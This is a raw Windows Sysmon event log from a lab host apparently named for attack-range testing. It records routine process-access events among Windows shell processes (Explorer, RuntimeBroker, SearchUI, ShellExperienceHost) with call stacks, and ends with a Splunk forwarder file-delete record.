09:21:48.822{5EBD8912-8D29-6151-8C00-00000000FD01}34084044C:\Windows\System32\RuntimeBroker.exe{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+3810b|C:\Windows\System32\execmodelclient.dll+8d5e|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+129f|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+375ad|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+524b9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001055837Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:48.775{5EBD8912-8D29-6151-8C00-00000000FD01}3408784C:\Windows\System32\RuntimeBroker.exe{5EBD8912-8D2A-6151-9600-00000000FD01}4632C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+3810b|C:\Windows\System32\TokenBroker.dll+1158a|C:\Windows\System32\TokenBroker.dll+d335|C:\Windows\System32\TokenBroker.dll+d669|C:\Windows\System32\TokenBroker.dll+1ff53|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+129f|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+8addb|C:\Windows\System32\combase.dll+8c2d2|C:\Windows\System32\combase.dll+39b93|C:\Windows\System32\combase.dll+8c4dd|C:\Windows\System32\combase.dll+37f4c|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+524b9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x80000000000000001055836Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:48.775{5EBD8912-8D29-6151-8C00-00000000FD01}3408784C:\Windows\System32\RuntimeBroker.exe{5EBD8912-8D2A-6151-9600-00000000FD01}4632C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+3810b|C:\Windows\System32\TokenBroker.dll+22ee6|C:\Windows\System32\TokenBroker.dll+114b3|C:\Windows\System32\TokenBroker.dll+d335|C:\Windows\System32\TokenBroker.dll+d669|C:\Windows\System32\TokenBroker.dll+1ff53|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+129f|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+8addb|C:\Windows\System32\combase.dll+8c2d2|C:\Windows\System32\combase.dll+39b93|C:\Windows\System32\combase.dll+8c4dd|C:\Windows\System32\combase.dll+37f4c|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+524b9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001055835Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:48.775{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12141|C:\Windows\SYSTEM32\psmserviceexthost.dll+170e8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055834Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:48.775{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12141|C:\Windows\SYSTEM32\psmserviceexthost.dll+170e8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055833Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:48.775{5EBD8912-8D2A-6151-9600-00000000FD01}46324912C:\Windows\Explorer.EXE{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+15bf06|C:\Windows\System32\TwinUI.dll+83087|C:\Windows\System32\TwinUI.dll+bb7be|C:\Windows\System32\TwinUI.dll+bb789|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055832Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:48.775{5EBD8912-8D2A-6151-9600-00000000FD01}46324912C:\Windows\Explorer.EXE{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+15bf06|C:\Windows\System32\TwinUI.dll+83087|C:\Windows\System32\TwinUI.dll+bb7be|C:\Windows\System32\TwinUI.dll+bb789|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055831Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:48.775{5EBD8912-8D2A-6151-9600-00000000FD01}46324860C:\Windows\Explorer.EXE{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+b6c18|C:\Windows\System32\TwinUI.dll+b7777|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+37c8f|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+34376|C:\Windows\System32\combase.dll+33b2a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000001055830Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:48.775{5EBD8912-8D2A-6151-9600-00000000FD01}46324860C:\Windows\Explorer.EXE{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+b6c18|C:\Windows\System32\TwinUI.dll+b7777|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+37c8f|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+34376|C:\Windows\System32\combase.dll+33b2a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000001055829Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:48.759{5EBD8912-8D29-6151-8F00-00000000FD01}42404312C:\Windows\system32\taskhostw.exe{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055828Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:48.759{5EBD8912-8CC0-6151-1000-00000000FD01}4401596C:\Windows\system32\svchost.exe{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055827Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:48.759{5EBD8912-8CC0-6151-1000-00000000FD01}4401596C:\Windows\system32\svchost.exe{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055826Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:48.697{5EBD8912-8D2A-6151-9600-00000000FD01}46324860C:\Windows\Explorer.EXE{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+b6c18|C:\Windows\System32\TwinUI.dll+b7777|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+37c8f|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+34376|C:\Windows\System32\combase.dll+33b2a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000001055825Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:48.697{5EBD8912-8D2A-6151-9600-00000000FD01}46324860C:\Windows\Explorer.EXE{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+b6c18|C:\Windows\System32\TwinUI.dll+b7777|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+37c8f|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+34376|C:\Windows\System32\combase.dll+33b2a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000001055824Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:48.681{5EBD8912-8D2A-6151-9600-00000000FD01}46324860C:\Windows\Explorer.EXE{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+3810b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5266|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+129f|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+37c8f|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+34376|C:\Windows\System32\combase.dll+33b2a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055823Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:48.681{5EBD8912-8D2A-6151-9600-00000000FD01}46324860C:\Windows\Explorer.EXE{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+3810b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+925b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+650d|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+521d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+129f|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+37c8f|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+34376|C:\Windows\System32\combase.dll+33b2a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae 10341000x80000000000000001055822Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:48.681{5EBD8912-8D2A-6151-9600-00000000FD01}46324860C:\Windows\Explorer.EXE{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+3810b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+658c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+64d9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+521d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+129f|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+37c8f|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+34376|C:\Windows\System32\combase.dll+33b2a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae 10341000x80000000000000001055821Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:48.681{5EBD8912-8D2A-6151-9600-00000000FD01}46324860C:\Windows\Explorer.EXE{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+3810b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+64ad|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+521d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+129f|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+37c8f|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+34376|C:\Windows\System32\combase.dll+33b2a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001055820Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:48.681{5EBD8912-8D2A-6151-9600-00000000FD01}46324860C:\Windows\Explorer.EXE{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+3810b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+925b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+650d|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+47a7|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+770f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+37c8f|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+34376|C:\Windows\System32\combase.dll+33b2a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000001055819Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:48.681{5EBD8912-8D2A-6151-9600-00000000FD01}46324860C:\Windows\Explorer.EXE{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+3810b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+658c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+64d9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+47a7|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+770f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+37c8f|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+34376|C:\Windows\System32\combase.dll+33b2a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000001055818Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:48.681{5EBD8912-8D2A-6151-9600-00000000FD01}46324860C:\Windows\Explorer.EXE{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+3810b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+64ad|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+47a7|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+770f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+37c8f|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+34376|C:\Windows\System32\combase.dll+33b2a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae 23542300x80000000000000001055817Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:48.681{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=206FE398B82AB1D7A41C851D98A5872E,SHA256=40C8E0463483D62FAA49307AF12E0BBC2BF71D884A783C09DFA9C1E29DA1F2D4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055816Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 